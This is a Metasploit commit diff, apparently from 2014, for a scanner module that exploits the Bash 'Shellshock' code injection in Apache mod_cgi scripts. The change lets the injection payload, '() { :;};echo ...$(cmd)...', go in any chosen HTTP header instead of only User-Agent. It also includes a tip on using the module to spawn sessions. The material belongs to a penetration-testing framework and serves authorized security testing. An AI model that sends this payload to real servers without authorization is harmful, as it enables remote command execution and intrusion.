Add header specification to check module, lands rapid7#3902

HD Moore · HD Moore · commit 64dbc396dd3e · 2014-09-27T12:58:29.000-05:00
diff --git a/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb b/modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb
@@ -17,7 +17,7 @@ def initialize(info = {})
       'Description' => %q{
         This module exploits a code injection in specially crafted environment
         variables in Bash, specifically targeting Apache mod_cgi scripts through
-        the HTTP_USER_AGENT variable.
+        the HTTP_USER_AGENT variable by default.
 
         PROTIP: Use exploit/multi/handler with a PAYLOAD appropriate to your
         CMD, set ExitOnSession false, run -j, and then run this module to create
@@ -38,8 +38,8 @@ def initialize(info = {})
 
     register_options([
       OptString.new('TARGETURI', [true, 'Path to CGI script']),
-      OptEnum.new('METHOD', [true, 'HTTP method to use', 'GET',
-        ['GET', 'POST']]),
+      OptString.new('METHOD', [true, 'HTTP method to use', 'GET']),
+      OptString.new('HEADER', [true, 'HTTP header to use', 'User-Agent']),
       OptString.new('CMD', [true, 'Command to run (absolute paths required)',
         '/usr/bin/id'])
     ], self.class)
@@ -98,7 +98,9 @@ def req(cmd)
     send_request_cgi(
       'method' => datastore['METHOD'],
       'uri' => normalize_uri(target_uri.path),
-      'agent' => "() { :;};echo #{@marker}$(#{cmd})#{@marker}"
+      'headers' => {
+        datastore['HEADER'] => "() { :;};echo #{@marker}$(#{cmd})#{@marker}"
+      }
     )
   end
 
